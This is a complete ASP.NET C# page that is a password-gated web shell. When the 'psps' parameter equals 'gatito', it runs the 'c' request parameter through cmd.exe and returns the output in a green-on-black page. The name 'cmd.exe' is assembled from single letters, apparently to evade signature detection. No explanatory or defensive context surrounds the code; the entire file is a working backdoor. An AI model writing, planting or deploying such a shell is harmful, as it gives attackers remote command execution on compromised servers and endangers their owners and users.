<%@ Page Language="C#" Debug="false" Trace="false" ResponseEncoding="utf-8" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
  if (Request["psps"] == "gatito"){
    Response.Write("<body style='background-color:black;color:green;'>");
    Response.Write("<pre>");
    Response.Write(Server.HtmlEncode(Er(Request["c"])));
    Response.Write("</pre>");
    Response.Write("</body>");
  }

}
string Er(string arg)
{
    ProcessStartInfo apex = new ProcessStartInfo();
    string p,r,o,g,m,prog;
    p= "c";r= "d";o= "m";g= "e";m= "x";
    prog = p+o+r+"."+g+m+g;
    apex.FileName = prog;
    apex.Arguments = "/c "+arg;
    apex.RedirectStandardOutput = true;
    apex.UseShellExecute = false;
    Process pr = Process.Start(apex);
    StreamReader stmrdr = pr.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
}
</script>
